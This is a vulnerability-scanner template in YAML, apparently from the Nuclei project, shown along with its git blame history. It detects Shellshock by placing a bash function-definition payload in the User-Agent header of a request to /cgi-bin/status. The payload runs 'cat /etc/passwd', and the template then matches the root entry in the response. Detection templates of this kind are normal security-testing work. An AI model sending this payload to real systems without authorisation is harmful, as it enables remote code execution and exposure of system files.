nuclei-templates/vulnerabilities/other/rce-shellshock-user-agent.yaml

id: rce-user-agent-shell-shock

info:
  name: Remote Code Execution Via (User-Agent)
  author: 0xelkomy
  severity: high
  tags: shellshock,rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/status"

    headers:
      User-Agent: "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'"

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
        part: body
Create rce-shellshock-user-agent.yaml 2020-05-28 15:20:00 +00:00			`id: rce-user-agent-shell-shock`

			`info:`
Adding tags to vulnerabilities and workflows 2021-02-12 05:53:01 +00:00			`name: Remote Code Execution Via (User-Agent)`
			`author: 0xelkomy`
			`severity: high`
			`tags: shellshock,rce`
Create rce-shellshock-user-agent.yaml 2020-05-28 15:20:00 +00:00
			`requests:`
Update rce-shellshock-user-agent.yaml 2021-02-13 04:55:02 +00:00			`- method: GET`
			`path:`
			`- "{{BaseURL}}/cgi-bin/status"`
removed extra headers not required for template 2021-09-08 12:17:19 +00:00
			`headers:`
			`User-Agent: "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'"`

Update rce-shellshock-user-agent.yaml 2021-02-13 04:55:02 +00:00			`matchers:`
			`- type: regex`
			`regex:`
matcher update to handle edge cases 2021-07-24 21:35:55 +00:00			`- "root:.*:0:0"`
Update rce-shellshock-user-agent.yaml 2021-02-13 04:55:02 +00:00			`part: body`